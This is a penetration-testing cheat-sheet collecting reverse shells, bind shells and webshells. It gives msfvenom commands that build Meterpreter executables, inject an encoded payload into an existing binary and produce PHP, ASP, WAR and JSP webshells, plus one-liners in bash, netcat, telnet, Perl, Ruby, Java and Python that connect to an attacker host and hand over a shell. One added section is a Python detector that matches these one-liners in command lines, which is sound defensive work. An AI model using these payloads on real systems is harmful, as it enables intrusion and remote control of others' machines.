# Shells

## Reverse-shells <a href="#reverse-shells" id="reverse-shells"></a>

This is a great collection of different types of reverse shells and webshells. Many of the ones listed below come from these cheat-sheets:\
<https://highon.coffee/blog/reverse-shell-cheat-sheet/>

<http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet>

#### Windows <a href="#windows" id="windows"></a>

**Meterpreter**

**Standard meterpreter**

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=445 -f exe -o shell_reverse.exe
```

```
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
```

**Meterpreter HTTPS**

This makes the Meterpreter traffic look like ordinary HTTPS. Because the session is TLS-encrypted, its contents are opaque to deep-packet inspection. Note that the handler uses a self-signed certificate unless you supply your own, so the connection can still stand out to inspection that examines certificate metadata.

```
msfvenom -p windows/meterpreter/reverse_https LHOST=ip LPORT=443 -f exe -o met_https_reverse.exe
```

**Non-staged payload**

```
msfvenom -p windows/shell_reverse_tcp LHOST=ip LPORT=445 -f exe -o shell_reverse_tcp.exe
```

```
use exploit/multi/handler
set payload windows/shell_reverse_tcp
```

**Staged payload**

A staged payload only carries a small stager that fetches the actual shell from the handler, so it must be caught with Metasploit; it does not work with netcat.

```
use exploit/multi/handler
set payload windows/shell/reverse_tcp
```

#### Inject payload into binary <a href="#inject-payload-into-binary" id="inject-payload-into-binary"></a>

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=445 -f exe -e x86/shikata_ga_nai -i 9 -x "/somebinary.exe" -o bad_binary.exe
```

### Linux <a href="#linux" id="linux"></a>

### Binary

```
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ip LPORT=443 -f elf > shell.elf
```

### Bash

```
0<&196;exec 196<>/dev/tcp/ip/80; sh <&196 >&196 2>&196
```

```
bash -i >& /dev/tcp/ip/8080 0>&1
```

### Php

```
php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
```

### Netcat

**Bind shell**

```
#Linux
nc -vlp 5555 -e /bin/bash
nc ip 5555

# Windows
nc.exe -nlvp 4444 -e cmd.exe
```

**Reverse shell**

```
# Linux
nc -lvp 5555
nc ip 5555 -e /bin/bash

# Windows
nc -lvp 443
nc.exe ip 443 -e cmd.exe
```

**With -e flag**

```
nc -e /bin/sh ATTACKING-IP 80
```

```
/bin/sh | nc ATTACKING-IP 80
```

**Without -e flag**

```
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0</tmp/p | /bin/sh 1>/tmp/p
```

### Ncat

Ncat, part of the Nmap project, is a modern reimplementation of netcat. One feature it has that netcat lacks is built-in encryption (`--ssl`). If you are on a pentest job you might not want to communicate unencrypted.

**Bind shell**

```
ncat --exec cmd.exe --allow 192.168.1.101 -vnl 5555 --ssl
ncat -v ip 5555 --ssl
```

### Telnet

```
rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0</tmp/p | /bin/sh 1>/tmp/p
```

```
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
```

### Perl

```
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

### Ruby

```
ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
```

#### Java <a href="#java" id="java"></a>

```
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```

### Python

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
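The one-liners above share a handful of tell-tale fragments (`/dev/tcp/`, `nc ... -e`, a `mknod` fifo relay, `sh -i`, a triple `dup2`, `fsockopen`). As an added example that is not part of the original cheat-sheet, here is a small Python detector that flags those fragments in process command lines; the sample lines are constructed, not real telemetry.

```python
import re

# Tell-tale fragments of the reverse-shell one-liners listed above.
# Each entry: (indicator name, compiled regex applied to one command line).
INDICATORS = [
    ("bash-dev-tcp",   re.compile(r"/dev/tcp/\S+/\d+")),
    ("nc-exec-flag",   re.compile(r"\b(?:nc|ncat|netcat)(?:\.exe)?\b.*\s(?:-e|-c|--exec)\s")),
    ("fifo-relay",     re.compile(r"\bmknod\s+\S+\s+p\b.*\b(?:nc|telnet)\b")),
    ("interactive-sh", re.compile(r"/bin/(?:ba)?sh\s+-i\b")),
    ("socket-dup2",    re.compile(r"\bdup2\(.*\bdup2\(.*\bdup2\(")),
    ("php-fsockopen",  re.compile(r"\bfsockopen\(")),
]

def find_indicators(cmdline):
    """Return the names of every indicator that matches a single command line."""
    return [name for name, rx in INDICATORS if rx.search(cmdline)]

def scan_lines(lines):
    """Return (line, indicators) for each line that hits at least one indicator."""
    hits = []
    for line in lines:
        found = find_indicators(line)
        if found:
            hits.append((line, found))
    return hits

# Constructed sample process command lines (e.g. from an execve audit feed).
SAMPLE_CMDLINES = [
    "bash -i >& /dev/tcp/10.0.0.5/8080 0>&1",
    "nc 10.0.0.5 5555 -e /bin/bash",
    "mknod /tmp/p p && telnet 10.0.0.5 80 0</tmp/p",
    ("python -c 'import socket,subprocess,os;s=socket.socket();"
     "s.connect((\"10.0.0.5\",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);"
     "os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"),
    "php -r '$sock=fsockopen(\"10.0.0.5\",80);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    "nc -zv 10.0.0.5 22",            # benign port check: -z, no -e
    "tar czf /tmp/backup.tgz /etc",  # benign
]

if __name__ == "__main__":
    for line, found in scan_lines(SAMPLE_CMDLINES):
        print(", ".join(found), "<-", line[:60])
```

The `-e`/`--exec` and `sh -i` patterns are deliberately narrow; widen them only with a false-positive review, since `-c` is also a common benign flag.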

### Web-shells  <a href="#web-shells---platform-independent" id="web-shells---platform-independent"></a>

### PHP

This PHP shell is OS-independent: it runs on both Linux and Windows.

```
msfvenom -p php/meterpreter_reverse_tcp LHOST=ip LPORT=443 -f raw > shell.php
```

### ASP

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=443 -f asp > shell.asp
```

### WAR

```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=ip LPORT=443 -f war > shell.war
```

### JSP

```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=ip LPORT=443 -f raw > shell.jsp
```
